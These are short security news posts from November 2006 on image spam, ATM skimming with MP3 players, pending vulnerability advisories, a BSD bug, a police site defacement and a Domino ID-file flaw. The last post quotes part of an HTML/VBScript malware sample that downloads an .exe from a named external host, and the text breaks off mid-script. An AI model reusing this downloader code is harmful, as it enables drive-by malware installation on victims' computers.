November 2006

Revenge of the Captcha! (Reverse Captcha, Ransom Notes and Image Spam)


thanks for the image to jeff chan. click on it for full size.

for months now, images have been increasingly seen in spam, reaching up to 30 to 40 per cent of all spam total. for a while, counter-measures have been in play, developed by many different folks, some we know, some we don’t. from system administrators developing signatures to a team at spamassasin working on an ocr system to break these images and check their text for spamishness.

when first encountered, a friend of mine was as excited as me: “why, it’s exactly like a captcha, only in reverse!”

hence the term i just coined – reverse captcha.

as it’s a cat and mouse game of escalations and counter-measured by bad guys and good guys, the bad guys learn and make our lives more difficult. i will try to explain what a reverse captcha is to me (and no, it’s not a special type of turing test, although we touch on that below).

Credit card data from cash machine line to…MP3 player!

This The Guardian article is quite confusing:

A [Manchester] man who used MP3 players to bug cash machines and steal the personal details of unsuspecting bank customers has been jailed for 32 months.

The report continues that 41 years old man and his team attached MP3 players to the backs of _free-standing_ cash machines in bars and bingo halls etc.

The data they recorded was the sound familiar from acoustically coupled modems and when you call to fax machine phone line!

The team had a special software for decoding the tones to readable information. It is easy to guess – yes, they cloned several credit cards with this mean.

ZDI: Symantec, Kaspersky, CA, MS have unpatched flaws

The Zero Day Initiative program lists several new vulnerabilities reported within a week. From their Upcoming ZDI Advisories page:

Affected Vendor – Severity – Reported on / Age:

Microsoft – High – 2006.11.08, 7 days ago (2 advisories)
Mozilla – High – 2006.11.08, 7 days ago
Computer Associates – High – 2006.11.08, 7 days ago (3 advisories)
Kaspersky – High – 2006.11.09, 6 days ago
Symantec – High – 2006.11.09, 6 days ago

It appears that many of them are related to AV or firewall software or am I wrong? CA, Kaspersky, Symantec etc.

Unknown Sophos products suffer from unpatched vulnerabilities too, but they are about two months old:

Sophos – High – 2006.09.14, 62 days ago (2 advisories)

And Mozilla and Microsoft products have their own unpatched issues listed as well.

Copy and Paste Security Bugs?? The *BSD case…

So, it’s time to another blog entry, another idiot/dumb post…

http://www.securityfocus.com/archive/1/451637/30/0/threaded

And for sure DragonFlyBSD and TrustedBSD* are also affected for this issue… why?

The bug occur because bsd developers does not know how integer convertion is done? Or just because you have copy and paste the bug from another BSD to yours? It’s always a problem when you copy code from another location. How secure is that code? What is the historical security problems it has? Let’s audit it!
Congratulations to you, OpenBSD guys, who simply don’t support things you don’t audit… why someone wanna use firewire? hehehe . Yeah! Is pretty easy talk about the problems, but, how I can help to solve it? I really dunno… In my mind, you need to understand the code you are copying, but, for god, please, copy it 😉

Cya,

Rodrigo Rubira Branco (BSDaemon).

Site of Polish police defaced

It appears that one Web site of Polish police www.elblag.policja.gov.pl/ has been defaced on Tuesday.

Mirror of Zone-H is located here. The home page was the target of the attack, i.e. that is the reason site is not working just now.

They were running on Linux and the following Apache system:

Apache-AdvancedExtranetServer/2.0.47 Mandrake Linux/1.6.91mdk mod_perl/1.99_08 Perl/v5.8.0 auth_mysql/1.11 mod_ssl/2.0.47 OpenSSL/0.9.7a PHP/4.3.1

If some of the readers know what the “elblag” means I will be grateful 😉

6 new advisories, none affect Vista

It sounds like a good start, Vista appears to be not affect any of the 6 new advisories released today by Microsoft. The vulnerability affecting Vista is the XML Core vulnerability in IE that has been recently exploited by malicious web sites to execute arbitrary code.

It would be interesting to see whether this trend of Vista staying outside the spotlight of vulnerabilities continues.

[UPDATE] – The XML vulnerability doesn’t affect Vista sorry for the confusion:

Is Windows Vista vulnerable to this issue?
Windows Vista does not include a vulnerable version of Microsoft XML Core Services. Windows Vista includes msxml6.dll version 6.10.1129 and is not vulnerable. However, if an application has been applied that installed a vulnerable version of Microsoft XML Core Services 4.0 this update should be applied

Notes/Domino flaw enables to steal ID files – via NRPC protocol

As users familiar with Notes/Domino systems know, publishing Address Books at company Web site is not a good idea.

Let’s look the risks of ID files now. It was not covered widely last week when information about information disclosure vulnerability in Domino systems was published. Notes Remote Procedure Call (NRPC) protocol on port 1352 enables to download user ID files remotely. Huh!

Versions 5.0, 6.0, 6.5, and 7.0 are affected. Fixed versions 6.5.5 Fix Pack 2 (FP2) and 7.0.2 have been released. There is no fix for R5 versions any more, because R5 is not supported any more. The vendor states that Windows, Linux, AIX and Solaris systems are vulnerable.

IBM Technote document #1248026 available here.

More details via FortConsult advisory [PDF] of Mr. Andrew Christensen.

But old fashioned organisations possible using Notes R5 still – it’s time to upgrade to R6 or R7 ASAP.

Malware utilizes AJAX to install itself

One of our customers have brought this HTML based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)